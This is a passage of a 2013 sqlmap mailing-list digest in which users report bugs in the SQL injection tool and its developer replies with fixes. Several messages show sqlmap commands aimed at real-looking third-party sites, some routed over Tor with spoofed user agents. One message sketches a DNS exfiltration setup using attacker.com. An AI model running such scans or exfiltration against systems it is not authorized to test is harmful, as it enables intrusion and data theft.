>>> > > > > Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7
>>> > > > > Connection: keep-alive
>>> > > > > Content-Type: application/x-www-form-urlencoded
>>> > > > > Content-Length: 67
>>> > > > >
>>> > > > > <abunchofpostparams>
>>> > > > >
>>> > > > >
>>> > > > > No hints that cookie-file is not in correct format
>>> > (I've been through this,
>>> > > > > at least I think I so ;) ).
>>> > > > >
>>> > > > > Any insight would be much appreciated.
>>> > > > >
>>> > > > >
>>> > > > > Cheers,
>>> > > > >
>>> > > > > Dirk
>>> > > > >
>>> > > > >
>>> > > > >
>>> >
>>> ------------------------------------------------------------------------------
>>> > > > > Precog is a next-generation analytics platform
>>> > capable of advanced
>>> > > > > analytics on semi-structured data. The platform
>>> > includes APIs for building
>>> > > > > apps and a phenomenal toolset for data science.
>>> > Developers can use
>>> > > > > our toolset for easy data analysis & visualization.
>>> > Get a free account!
>>> > > > >
>>> > http://www2.precog.com/precogplatform/slashdotnewsletter
>>> > > > > _______________________________________________
>>> > > > > sqlmap-users mailing list
>>> > > > > sql...@li... <mailto:
>>> > sql...@li...> <mailto:
>>> > sql...@li... <mailto:
>>> > sql...@li...>> <mailto:
>>> > sql...@li... <mailto:
>>> > sql...@li...> <mailto:
>>> > sql...@li... <mailto:
>>> > sql...@li...>>>
>>> > > > >
>>> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>> > > > >
>>> > > > >
>>> > > > >
>>> > > > >
>>> > > > > --
>>> > > > > Miroslav Stampar
>>> > > > > http://about.me/stamparm
>>> > > >
>>> > > >
>>> > > >
>>> > > >
>>> > > > --
>>> > > > Miroslav Stampar
>>> > > > http://about.me/stamparm
>>> > >
>>> > >
>>> > >
>>> > >
>>> > > --
>>> > > Miroslav Stampar
>>> > > http://about.me/stamparm
>>> > >
>>> > >
>>> > >
>>> > >
>>> > > --
>>> > > Miroslav Stampar
>>> > > http://about.me/stamparm
>>> >
>>> >
>>>
>>>
>>> --
>>> Miroslav Stampar
>>> http://about.me/stamparm
>>> -------------- next part --------------
>>> An HTML attachment was scrubbed...
>>>
>>> ------------------------------
>>>
>>> Message: 4
>>> Date: Mon, 15 Apr 2013 11:46:21 +0200
>>> From: Miroslav Stampar <mir...@gm...>
>>> Subject: Re: [sqlmap-users] Patch for /task/<task_id>/delete in
>>> clean_filesystem
>>> To: Brandon Perry <bpe...@gm...>
>>> Cc: sqlmap users <sql...@li...>
>>> Message-ID:
>>> <CA+9yoX3RNQDm=PqT...@ma...>
>>> Content-Type: text/plain; charset="iso-8859-1"
>>>
>>> Hi Brandon.
>>>
>>> Thank you for your patch and find it now included [1].
>>>
>>> Kind regards,
>>> Miroslav Stampar
>>>
>>> [1]
>>>
>>> https://github.com/sqlmapproject/sqlmap/commit/8853e43616e89f26cfd6d1c1540e02ed6b4ca224
>>>
>>>
>>> On Sat, Apr 13, 2013 at 8:36 PM, Brandon Perry <
>>> bpe...@gm...>wrote:
>>>
>>> > Hi, the attached patch fixes an issue with the /task/<task_id>/delete
>>> api
>>> > call when self.output_directory is NoneType and clean_system() is
>>> called.
>>> >
>>> > --
>>> > http://volatile-minds.blogspot.com -- blog
>>> > http://www.volatileminds.net -- website
>>> >
>>> >
>>> >
>>> ------------------------------------------------------------------------------
>>> > Precog is a next-generation analytics platform capable of advanced
>>> > analytics on semi-structured data. The platform includes APIs for
>>> building
>>> > apps and a phenomenal toolset for data science. Developers can use
>>> > our toolset for easy data analysis & visualization. Get a free account!
>>> > http://www2.precog.com/precogplatform/slashdotnewsletter
>>> > _______________________________________________
>>> > sqlmap-users mailing list
>>> > sql...@li...
>>> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>> >
>>> >
>>>
>>>
>>> --
>>> Miroslav Stampar
>>> http://about.me/stamparm
>>> -------------- next part --------------
>>> An HTML attachment was scrubbed...
>>>
>>> ------------------------------
>>>
>>> Message: 5
>>> Date: Mon, 15 Apr 2013 12:19:13 +0200
>>> From: Dirk Wetter <sp...@dr...>
>>> Subject: Re: [sqlmap-users] --load-cookies
>>> To: Miroslav Stampar <mir...@gm...>
>>> Cc: SqlMap List <sql...@li...>
>>> Message-ID: <516...@dr...>
>>> Content-Type: text/plain; charset=ISO-8859-1
>>>
>>> Hi Miroslav,
>>>
>>> On 04/15/2013 11:45 AM, Miroslav Stampar wrote:
>>> > Hi Dirk.
>>> >
>>> > Now that crash should be "patched".
>>> >
>>> > Could you please retry it now and say if the latest revision suits
>>> your needs?
>>>
>>> cool, thx. Works!
>>>
>>> However (sorry):
>>>
>>> One needs to omit the cookie in the request header, otherwise it just
>>> uses the one
>>> supplied by the request.
>>>
>>> Then: It doesn't change the cookie. Maybe I was interpreting that not
>>> correctly
>>> but my point was using the load-cookies option to direct sqlmap to change
>>> cookies once in a while (whenever that's gonna be). This is to circumvent
>>> restrictions one can encounter otherwise....
>>>
>>> Cheers,
>>>
>>> Dirk
>>>
>>>
>>> >
>>> > Kind regards,
>>> > Miroslav Stampar
>>> >
>>> >
>>> > On Mon, Apr 15, 2013 at 11:36 AM, Dirk Wetter <sp...@dr...<mailto:
>>> sp...@dr...>> wrote:
>>> >
>>> >
>>> >
>>> > On 04/14/2013 01:14 AM, Miroslav Stampar wrote:
>>> > > Nevertheless, with the latest commit that check should be
>>> "neutralized" now. Could you please retry it now?
>>> >
>>> > thx, Miroslav. I tried (b6fee63) but this time the cookie parser lib
>>> hiccups, using the same file:
>>> >
>>> > /usr/lib64/python2.7/_MozillaCookieJar.py:109: UserWarning: cookielib
>>> bug!
>>> > Traceback (most recent call last):
>>> > File "/usr/lib64/python2.7/_MozillaCookieJar.py", line 82, in
>>> _really_load
>>> > assert domain_specified == initial_dot
>>> > AssertionError
>>> >
>>> > _warn_unhandled_exception()
>>> > [11:13:26] [CRITICAL] there was a problem loading cookies file
>>> ('invalid Netscape format cookies file '/tmp/sqlmapcj-pbP7P1':
>>> '<FQDN>\tTRUE\t<PATH>\tTRUE\t9999999999\tJSESSIONID\t6ADFAA167AA89CF993061E5CACEF46C9'')
>>> >
>>> > the 999.. looks strange to me.
>>> >
>>> > >
>>> > >
>>> > > On Sun, Apr 14, 2013 at 12:59 AM, Miroslav Stampar <
>>> mir...@gm... <mailto:mir...@gm...> <mailto:
>>> mir...@gm... <mailto:mir...@gm...>>> wrote:
>>> > >
>>> > > Hi Dirk.
>>> > >
>>> > > Well, I would say that you have an expired cookie. Do you see that
>>> value 0? That value should be a valid UNIX time representing time of cookie
>>> expiration. Also, I've just tested that cookie of yours and sqlmap says:
>>> "[WARNING] cookie '....' has expired"
>>> > >
>>> >
>>> > that's true but IMO 0 represents just a session cookie. Example:
>>> >
>>> > prompt% wget -q -O /dev/null --keep-session-cookies
>>> --save-cookies=/dev/stdout bing.com <http://bing.com>
>>> > # HTTP cookie file.
>>> > # Generated by Wget on 2013-04-15 11:23:13.
>>> > # Edit at your own risk.
>>> >
>>> > .bing.com <http://bing.com> TRUE / FALSE 1429089794 SRCHUSR
>>> AUTOREDIR=0&GEOVAR=&DOB=20130415
>>> > .bing.com <http://bing.com> TRUE / FALSE 1429089794 SRCHD
>>> D=2781203&MS=2781203&AF=NOFORM
>>> > .bing.com <http://bing.com> TRUE / FALSE 1429089794 OrigMUID
>>> 333995A69E06630B2EB491169F016314%2cfc3b876c239e43d4bfc1544927289abe
>>> > .bing.com <http://bing.com> TRUE / FALSE 1429089794 MUID
>>> 333995A69E06630B2EB491169F016314
>>> > .bing.com <http://bing.com> TRUE / FALSE 0 _SS
>>> SID=B954CB7EDF8643CABAD8013F27A241E7
>>> > .bing.com <http://bing.com> TRUE / FALSE 0 _HOP
>>> > .bing.com <http://bing.com> TRUE / FALSE 0 _FS NU=1
>>> > .bing.com <http://bing.com> TRUE / FALSE 1429089794 _FP EM=1
>>> > www.bing.com <http://www.bing.com> FALSE / FALSE 1429089794 SRCHUID
>>> V=2&GUID=975091780DFF407DA9DD07139FD97C4D
>>> > www.bing.com <http://www.bing.com> FALSE / FALSE 1429089794 MUIDB
>>> 333995A69E06630B2EB491169F016314
>>> >
>>> > prompt%
>>> >
>>> > Same parser problem btw if I edit the cookie file and put 1429089794
>>> unix time instead of 0 in there.
>>> >
>>> > Ok: With the prev rev ed5599f it reads this file ok (no session
>>> cookies but cookies w/ expiration date) and uses the last
>>> > cookie only for the first 120 tries.
>>> >
>>> > Cheers, Dirk
>>> >
>>> >
>>> > >
>>> > > Kind regards,
>>> > > Miroslav Stampar
>>> > >
>>> > >
>>> > > On Sat, Apr 13, 2013 at 12:54 PM, Dirk Wetter <sp...@dr...<mailto:
>>> sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>>>
>>> wrote:
>>> > >
>>> > >
>>> > > Hi Miroslav,
>>> > >
>>> > > thx for your prompt answer.
>>> > >
>>> > > On 04/12/2013 07:45 PM, Miroslav Stampar wrote:
>>> > > > Hi Dirk.
>>> > > >
>>> > > > Could you please get the latest revision and retry it again?
>>> > > ed5599f: almost the same: with cookie in the header sqlmap takes
>>> only this one.
>>> > > The slight difference seems to be that in the case where I didn't
>>> supply a cookie
>>> > > sqlmap doesn't use any cookie at all, i.e. now not the one from the
>>> server anymore.
>>> > > >
>>> > > > There was a situation where info messages have been wrongly
>>> written that original response contained Set-Cookie in situations like
>>> yours.
>>> > > >
>>> > > > In case that everything stays as it is, I'll need to ask you to
>>> provide more details. For example, cookie file would be great.
>>> > >
>>> > > sure, here you go:
>>> > >
>>> > > --snip
>>> > > # Netscape HTTP Cookie File
>>> > > <FQDN> \t FALSE \t <path> \t TRUE \t 0 \t JSESSIONID \t <Cookie>
>>> > > [..]
>>> > > --snap
>>> > >
>>> > > They are all session cookies. For easier reading here I put some
>>> blanks in the line
>>> > > above, in "cookie-file" there aren't any though. Cookies were
>>> generated with
>>> > > stompy and a shell script (looks he same as with
>>> > > wget -S -O /dev/null --keep-session-cookies --save-cookies=<file>
>>> <URL>)
>>> > >
>>> > > Again: sqlmap doesn't hiccup/complain while eating my cookies file
>>> ;-)
>>> > >
>>> > > >
>>> > > > Also, please make sure that the cookie file contains proper
>>> cookie(s) - domain name should be the same as a domain of target, cookie
>>> needs to have a proper valid time, etc.
>>> > >
>>> > > see above.
>>> > >
>>> > > Cheers,
>>> > >
>>> > > Dirk
>>> > >
>>> > > >
>>> > > >
>>> > > > On Fri, Apr 12, 2013 at 4:50 PM, Dirk Wetter <sp...@dr...<mailto:
>>> sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>>
>>> <mailto:sp...@dr... <mailto:sp...@dr...> <mailto:
>>> sp...@dr... <mailto:sp...@dr...>>>> wrote:
>>> > > >
>>> > > > Hi Miroslav,
>>> > > >
>>> > > > yes unfortunately.
>>> > > >
>>> > > > If I omit the cookie line in the request header completely, sqlmap
>>> > > > seems to take the first cookie issued by the server with
>>> set-cookie (and
>>> > > > put's it silently in).
>>> > > >
>>> > > > Cheers,
>>> > > >
>>> > > > Dirk
>>> > > >
>>> > > >
>>> > > >
>>> > > > On 04/12/2013 03:24 PM, Miroslav Stampar wrote:
>>> > > > > Hi.
>>> > > > >
>>> > > > > And this is also happening if you are skipping "Cookie:
>>> JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7" from the original request?
>>> > > > >
>>> > > > > Kind regards,
>>> > > > > Miroslav Stampar
>>> > > > >
>>> > > > >
>>> > > > > On Fri, Apr 12, 2013 at 3:10 PM, Dirk Wetter <sp...@dr...<mailto:
>>> sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>>
>>> <mailto:sp...@dr... <mailto:sp...@dr...> <mailto:
>>> sp...@dr... <mailto:sp...@dr...>>> <mailto:sp...@dr...<mailto:
>>> sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>>
>>> <mailto:sp...@dr... <mailto:sp...@dr...> <mailto:
>>> sp...@dr... <mailto:sp...@dr...>>>>> wrote:
>>> > > > >
>>> > > > >
>>> > > > > Hi folks,
>>> > > > >
>>> > > > > .... that doesn't work for me. It always uses the cookie supplied
>>> > > > > (below in $REQUEST, or if I omit the line in $REQUEST the one
>>> > > > > from the 1st server reply is being used)
>>> > > > >
>>> > > > > So what is wrong in here:
>>> > > > >
>>> > > > > cd ~/networking/tools/sqlmap/sqlmap-dev1.0-dev-ea12cce
>>> > > > > ./sqlmap.py --ignore-proxy --force-ssl --beep \
>>> > > > > --threads=8 -v 6 --load-cookies=$WD/cookie-file \
>>> > > > > --level=2 --risk=2 -r $REQUEST
>>> > > > >
>>> > > > > The content of the file $REQUEST is:
>>> > > > >
>>> > > > > POST <URL> HTTP/1.1
>>> > > > > Host: <HOST>
>>> > > > > User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US)
>>> AppleWebKit/525.13 (KHTML, like Gecko)
>>> > > > > Chrome/0.2.149.6 <http://0.2.149.6> <http://0.2.149.6> <
>>> http://0.2.149.6> <http://0.2.149.6> Safari/525.13
>>> > > > > Accept:
>>> text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
>>> > > > > Accept-Language: en-US,en;q=0.5
>>> > > > > Accept-Encoding: gzip, deflate
>>> > > > > Referer: <Referer>
>>> > > > > Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7
>>> > > > > Connection: keep-alive
>>> > > > > Content-Type: application/x-www-form-urlencoded
>>> > > > > Content-Length: 67
>>> > > > >
>>> > > > > <abunchofpostparams>
>>> > > > >
>>> > > > >
>>> > > > > No hints that cookie-file is not in correct format (I've been
>>> through this,
>>> > > > > at least I think I so ;) ).
>>> > > > >
>>> > > > > Any insight would be much appreciated.
>>> > > > >
>>> > > > >
>>> > > > > Cheers,
>>> > > > >
>>> > > > > Dirk
>>> > > > >
>>> > > > >
>>> > > > >
>>> ------------------------------------------------------------------------------
>>> > > > > Precog is a next-generation analytics platform capable of
>>> advanced
>>> > > > > analytics on semi-structured data. The platform includes APIs
>>> for building
>>> > > > > apps and a phenomenal toolset for data science. Developers can
>>> use
>>> > > > > our toolset for easy data analysis & visualization. Get a free
>>> account!
>>> > > > > http://www2.precog.com/precogplatform/slashdotnewsletter
>>> > > > > _______________________________________________
>>> > > > > sqlmap-users mailing list
>>> > > > > sql...@li... <mailto:
>>> sql...@li...> <mailto:
>>> sql...@li... <mailto:
>>> sql...@li...>> <mailto:
>>> sql...@li... <mailto:
>>> sql...@li...> <mailto:
>>> sql...@li... <mailto:
>>> sql...@li...>>> <mailto:
>>> sql...@li... <mailto:
>>> sql...@li...> <mailto:
>>> sql...@li... <mailto:
>>> sql...@li...>> <mailto:
>>> sql...@li... <mailto:
>>> sql...@li...> <mailto:
>>> sql...@li... <mailto:
>>> sql...@li...>>>>
>>> > > > > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>> > > > >
>>> > > > >
>>> > > > >
>>> > > > >
>>> > > > > --
>>> > > > > Miroslav Stampar
>>> > > > > http://about.me/stamparm
>>> > > >
>>> > > >
>>> > > >
>>> > > >
>>> > > > --
>>> > > > Miroslav Stampar
>>> > > > http://about.me/stamparm
>>> > >
>>> > >
>>> > >
>>> > >
>>> > > --
>>> > > Miroslav Stampar
>>> > > http://about.me/stamparm
>>> > >
>>> > >
>>> > >
>>> > >
>>> > > --
>>> > > Miroslav Stampar
>>> > > http://about.me/stamparm
>>> >
>>> >
>>> >
>>> >
>>> > --
>>> > Miroslav Stampar
>>> > http://about.me/stamparm
>>>
>>>
>>>
>>>
>>> ------------------------------
>>>
>>> Message: 6
>>> Date: Mon, 15 Apr 2013 14:01:01 -0700
>>> From: <co...@5i...>
>>> Subject: [sqlmap-users] --host parameter
>>> To: sql...@li...
>>> Message-ID:
>>> <
>>> 201...@em...
>>> >
>>>
>>> Content-Type: text/plain; charset="utf-8"
>>>
>>> Hello,
>>> the --host doesn't work as expected, or I am doing something wrong:
>>>
>>>
>>> this works as expected:
>>>
>>> ./sqlmap.py --url='http://i.csland.ro/index.php?id=0'
>>>
>>> sqlmap/1.0-dev-840ee26 - automatic SQL injection and database
>>> takeover tool
>>> http://sqlmap.org
>>>
>>> [!] legal disclaimer: Usage of sqlmap for attacking targets without
>>> prior mutual consent is illegal. It is the end user's responsibility to
>>> obey all applicable local, state and federal laws. Developers assume no
>>> liability and are not responsible for any misuse or damage caused by
>>> this program
>>>
>>> [*] starting at 23:57:15
>>>
>>> [23:57:15] [INFO] testing connection to the target URL
>>> [23:57:15] [INFO] heuristics detected web page charset 'ascii'
>>> [23:57:15] [INFO] testing if the target URL is stable. This can take a
>>> couple of seconds
>>> [23:57:16] [INFO] target URL is stable
>>> [23:57:16] [INFO] testing if GET parameter 'id' is dynamic
>>> [23:57:16] [INFO] confirming that GET parameter 'id' is dynamic
>>> [23:57:16] [INFO] GET parameter 'id' is dynamic
>>> [23:57:16] [INFO] heuristic (basic) test shows that GET parameter 'id'
>>> might be injectable (possible DBMS: 'MySQL')
>>> [23:57:16] [INFO] testing for SQL injection on GET parameter 'id'
>>>
>>>
>>> ....
>>>
>>>
>>> this doesn't work as expected:
>>>
>>> ./sqlmap.py --host='i.csland.ro'
>>> --url='http://188.240.236.15/index.php?id=0'
>>>
>>> sqlmap/1.0-dev-840ee26 - automatic SQL injection and database
>>> takeover tool
>>> http://sqlmap.org
>>>
>>> [!] legal disclaimer: Usage of sqlmap for attacking targets without
>>> prior mutual consent is illegal. It is the end user's responsibility to
>>> obey all applicable local, state and federal laws. Developers assume no
>>> liability and are not responsible for any misuse or damage caused by
>>> this program
>>>
>>> [*] starting at 23:58:03
>>>
>>> [23:58:03] [INFO] testing connection to the target URL
>>> [23:58:03] [CRITICAL] page not found (404)
>>> it is not recommended to continue in this kind of cases. Do you want to
>>> quit and make sure that everything is set up properly? [Y/n]
>>> [23:58:05] [WARNING] HTTP error codes detected during run:
>>>
>>> ............
>>>
>>>
>>> Of course i.csland.ro resolves to 188.240.236.15. Any idea?
>>>
>>> Thanks.
>>>
>>>
>>>
>>>
>>> ------------------------------
>>>
>>> Message: 7
>>> Date: Tue, 16 Apr 2013 09:12:05 +1100
>>> From: ???????? ?????? <vo...@s2...>
>>> Subject: [sqlmap-users] Sqlmap and direct connect error
>>> To: sql...@li...
>>> Message-ID: <C59...@s2...>
>>> Content-Type: text/plain; charset=us-ascii
>>>
>>> Hi!
>>>
>>> This bug detected if add direct param.
>>>
>>> python sqlmap.py -d "mysql://yakimov:pass@127.0.0.1:3306/tech" -u "
>>> http://s25.ru/index.phtml?center=7&id=186" --random-agent --tor
>>> --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables
>>> --exclude-sysdbs
>>>
>>>
>>> [01:48:28] [CRITICAL] unhandled exception in sqlmap/1.0-dev-de99717,
>>> retry your run with the latest development version from the GitHub
>>> repository. If the exception persists, please send by e-mail to '
>>> sql...@li...' or open a new issue at '
>>> https://github.com/sqlmapproject/sqlmap/issues/new' with the following
>>> text and any information required to reproduce the bug. The developers will
>>> try to reproduce the bug, fix it accordingly and get back to you.
>>> sqlmap version: 1.0-dev-de99717
>>> Python version: 2.7.3
>>> Operating system: posix
>>> Command line: sqlmap.py -d
>>> **************************************************** -u
>>> http://s25.ru/index.phtml?center=7&id=186 --random-agent --tor
>>> --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables
>>> --exclude-sysdbs
>>> Technique: None
>>> Back-end DBMS: MySQL (identified)
>>> Traceback (most recent call last):
>>> File "sqlmap.py", line 87, in main
>>> start()
>>> File "/home/yakimov/sqlmap/lib/controller/controller.py", line 248, in
>>> start
>>> action()
>>> File "/home/yakimov/sqlmap/lib/controller/action.py", line 32, in action
>>> setHandler()
>>> File "/home/yakimov/sqlmap/lib/controller/handler.py", line 95, in
>>> setHandler
>>> conf.dbmsConnector.connect()
>>> File "/home/yakimov/sqlmap/plugins/dbms/mysql/connector.py", line 38, in
>>> connect
>>> self.connector = pymysql.connect(host=self.hostname, user=self.user,
>>> passwd=self.password, db=self.db, port=self.port,
>>> connect_timeout=conf.timeout, use_unicode=True)
>>> File
>>> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/__init__.py",
>>> line 93, in Connect
>>> return Connection(*args, **kwargs)
>>> File
>>> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py",
>>> line 584, in __init__
>>> self._connect()
>>> File
>>> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py",
>>> line 739, in _connect
>>> sock.connect((self.host, self.port))
>>> File "/home/yakimov/sqlmap/thirdparty/socks/socks.py", line 365, in
>>> connect
>>> raise GeneralProxyError((5, _generalerrors[5]))
>>> GeneralProxyError: (5, 'bad input')
>>>
>>>
>>>
>>>
>>> ------------------------------
>>>
>>> Message: 8
>>> Date: Tue, 16 Apr 2013 14:19:18 +0200
>>> From: Miroslav Stampar <mir...@gm...>
>>> Subject: Re: [sqlmap-users] --host parameter
>>> To: co...@5i...
>>> Cc: SqlMap List <sql...@li...>
>>> Message-ID:
>>> <CA+...@ma...>
>>> Content-Type: text/plain; charset="iso-8859-1"
>>>
>>> Hi.
>>>
>>> Thank you for your report and find it fixed with the latest commit [1].
>>>
>>> Kind regards,
>>> Miroslav Stampar
>>>
>>> [1]
>>>
>>> https://github.com/sqlmapproject/sqlmap/commit/6fed1921edf1baaf23a54fbe340ff3781fc05c86
>>>
>>>
>>> On Mon, Apr 15, 2013 at 11:01 PM, <co...@5i...> wrote:
>>>
>>> > Hello,
>>> > the --host doesn't work as expected, or I am doing something wrong:
>>> >
>>> >
>>> > this works as expected:
>>> >
>>> > ./sqlmap.py --url='http://i.csland.ro/index.php?id=0'
>>> >
>>> > sqlmap/1.0-dev-840ee26 - automatic SQL injection and database
>>> > takeover tool
>>> > http://sqlmap.org
>>> >
>>> > [!] legal disclaimer: Usage of sqlmap for attacking targets without
>>> > prior mutual consent is illegal. It is the end user's responsibility to
>>> > obey all applicable local, state and federal laws. Developers assume no
>>> > liability and are not responsible for any misuse or damage caused by
>>> > this program
>>> >
>>> > [*] starting at 23:57:15
>>> >
>>> > [23:57:15] [INFO] testing connection to the target URL
>>> > [23:57:15] [INFO] heuristics detected web page charset 'ascii'
>>> > [23:57:15] [INFO] testing if the target URL is stable. This can take a
>>> > couple of seconds
>>> > [23:57:16] [INFO] target URL is stable
>>> > [23:57:16] [INFO] testing if GET parameter 'id' is dynamic
>>> > [23:57:16] [INFO] confirming that GET parameter 'id' is dynamic
>>> > [23:57:16] [INFO] GET parameter 'id' is dynamic
>>> > [23:57:16] [INFO] heuristic (basic) test shows that GET parameter 'id'
>>> > might be injectable (possible DBMS: 'MySQL')
>>> > [23:57:16] [INFO] testing for SQL injection on GET parameter 'id'
>>> >
>>> >
>>> > ....
>>> >
>>> >
>>> > this doesn't work as expected:
>>> >
>>> > ./sqlmap.py --host='i.csland.ro'
>>> > --url='http://188.240.236.15/index.php?id=0'
>>> >
>>> > sqlmap/1.0-dev-840ee26 - automatic SQL injection and database
>>> > takeover tool
>>> > http://sqlmap.org
>>> >
>>> > [!] legal disclaimer: Usage of sqlmap for attacking targets without
>>> > prior mutual consent is illegal. It is the end user's responsibility to
>>> > obey all applicable local, state and federal laws. Developers assume no
>>> > liability and are not responsible for any misuse or damage caused by
>>> > this program
>>> >
>>> > [*] starting at 23:58:03
>>> >
>>> > [23:58:03] [INFO] testing connection to the target URL
>>> > [23:58:03] [CRITICAL] page not found (404)
>>> > it is not recommended to continue in this kind of cases. Do you want to
>>> > quit and make sure that everything is set up properly? [Y/n]
>>> > [23:58:05] [WARNING] HTTP error codes detected during run:
>>> >
>>> > ............
>>> >
>>> >
>>> > Of course i.csland.ro resolves to 188.240.236.15. Any idea?
>>> >
>>> > Thanks.
>>> >
>>> >
>>> >
>>> >
>>> ------------------------------------------------------------------------------
>>> > Precog is a next-generation analytics platform capable of advanced
>>> > analytics on semi-structured data. The platform includes APIs for
>>> building
>>> > apps and a phenomenal toolset for data science. Developers can use
>>> > our toolset for easy data analysis & visualization. Get a free account!
>>> > http://www2.precog.com/precogplatform/slashdotnewsletter
>>> > _______________________________________________
>>> > sqlmap-users mailing list
>>> > sql...@li...
>>> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>> >
>>>
>>>
>>>
>>> --
>>> Miroslav Stampar
>>> http://about.me/stamparm
>>> -------------- next part --------------
>>> An HTML attachment was scrubbed...
>>>
>>> ------------------------------
>>>
>>> Message: 9
>>> Date: Tue, 16 Apr 2013 14:33:33 +0200
>>> From: Miroslav Stampar <mir...@gm...>
>>> Subject: Re: [sqlmap-users] Sqlmap and direct connect error
>>> To: ???????? ?????? <vo...@s2...>
>>> Cc: SqlMap List <sql...@li...>
>>> Message-ID:
>>> <CA+9yoX0rxH+=vZuYiArFNZhK1xhwos=SNhMqEmFmnCafw-ot=g...@ma...>
>>> Content-Type: text/plain; charset="koi8-r"
>>>
>>> Hi Vladimir.
>>>
>>> Find it "patched" with the latest commit [1]. Basically, those
>>> combinations
>>> should not be allowed (-d and --url; -d and --tor; etc.) and now we've
>>> added new option validation checks for this kind of cases.
>>>
>>> Kind regards,
>>> Miroslav Stampar
>>>
>>> [1]
>>>
>>> https://github.com/sqlmapproject/sqlmap/commit/c73489aff3861f1cac7de41494a296c1095e141a
>>>
>>>
>>> On Tue, Apr 16, 2013 at 12:12 AM, ???????? ?????? <vo...@s2...> wrote:
>>>
>>> > Hi!
>>> >
>>> > This bug detected if add direct param.
>>> >
>>> > python sqlmap.py -d "mysql://yakimov:pass@127.0.0.1:3306/tech" -u "
>>> > http://s25.ru/index.phtml?center=7&id=186" --random-agent --tor
>>> > --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables
>>> > --exclude-sysdbs
>>> >
>>> >
>>> > [01:48:28] [CRITICAL] unhandled exception in sqlmap/1.0-dev-de99717,
>>> retry
>>> > your run with the latest development version from the GitHub
>>> repository. If
>>> > the exception persists, please send by e-mail to '
>>> > sql...@li...' or open a new issue at '
>>> > https://github.com/sqlmapproject/sqlmap/issues/new' with the following
>>> > text and any information required to reproduce the bug. The developers
>>> will
>>> > try to reproduce the bug, fix it accordingly and get back to you.
>>> > sqlmap version: 1.0-dev-de99717
>>> > Python version: 2.7.3
>>> > Operating system: posix
>>> > Command line: sqlmap.py -d
>>> > **************************************************** -u
>>> > http://s25.ru/index.phtml?center=7&id=186 --random-agent --tor
>>> > --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables
>>> > --exclude-sysdbs
>>> > Technique: None
>>> > Back-end DBMS: MySQL (identified)
>>> > Traceback (most recent call last):
>>> > File "sqlmap.py", line 87, in main
>>> > start()
>>> > File "/home/yakimov/sqlmap/lib/controller/controller.py", line 248, in
>>> > start
>>> > action()
>>> > File "/home/yakimov/sqlmap/lib/controller/action.py", line 32, in
>>> action
>>> > setHandler()
>>> > File "/home/yakimov/sqlmap/lib/controller/handler.py", line 95, in
>>> > setHandler
>>> > conf.dbmsConnector.connect()
>>> > File "/home/yakimov/sqlmap/plugins/dbms/mysql/connector.py", line 38,
>>> in
>>> > connect
>>> > self.connector = pymysql.connect(host=self.hostname, user=self.user,
>>> > passwd=self.password, db=self.db, port=self.port,
>>> > connect_timeout=conf.timeout, use_unicode=True)
>>> > File
>>> >
>>> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/__init__.py",
>>> > line 93, in Connect
>>> > return Connection(*args, **kwargs)
>>> > File
>>> >
>>> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py",
>>> > line 584, in __init__
>>> > self._connect()
>>> > File
>>> >
>>> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py",
>>> > line 739, in _connect
>>> > sock.connect((self.host, self.port))
>>> > File "/home/yakimov/sqlmap/thirdparty/socks/socks.py", line 365, in
>>> > connect
>>> > raise GeneralProxyError((5, _generalerrors[5]))
>>> > GeneralProxyError: (5, 'bad input')
>>> >
>>> >
>>> >
>>> >
>>> ------------------------------------------------------------------------------
>>> > Precog is a next-generation analytics platform capable of advanced
>>> > analytics on semi-structured data. The platform includes APIs for
>>> building
>>> > apps and a phenomenal toolset for data science. Developers can use
>>> > our toolset for easy data analysis & visualization. Get a free account!
>>> > http://www2.precog.com/precogplatform/slashdotnewsletter
>>> > _______________________________________________
>>> > sqlmap-users mailing list
>>> > sql...@li...
>>> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>> >
>>>
>>>
>>>
>>> --
>>> Miroslav Stampar
>>> http://about.me/stamparm
>>> -------------- next part --------------
>>> An HTML attachment was scrubbed...
>>>
>>> ------------------------------
>>>
>>> Message: 10
>>> Date: Tue, 16 Apr 2013 23:26:39 +0200
>>> From: buawig <bu...@gm...>
>>> Subject: [sqlmap-users] feature request: offline mode for
>>> --dns-domain?
>>> To: SqlMap List <sql...@li...>
>>> Message-ID: <516...@gm...>
>>> Content-Type: text/plain; charset=UTF-8
>>>
>>> -----BEGIN PGP SIGNED MESSAGE-----
>>> Hash: SHA512
>>>
>>> Hi,
>>>
>>> in cases where sqlmap is run against targets on internal networks it
>>> would be great if one could tell sqlmap to simply proceed without
>>> expecting incoming DNS requests, because sqlmap can not be executed
>>> directly on the DNS server (which can't reach the target, but the
>>> target can reach the DNS server).
>>>
>>> For me it would be enough to simply run something like
>>> - -u ... --dns-domain=attacker.com --dns-port=0
>>> (--dns-port does not exist [yet])
>>>
>>> to let sqlmap know that it doesn't need to start a DNS listener.
>>>
>>> I would then collect and decode the DNS querries on the DNS server
>>> manually, but I could also envision running a second sqlmap instance
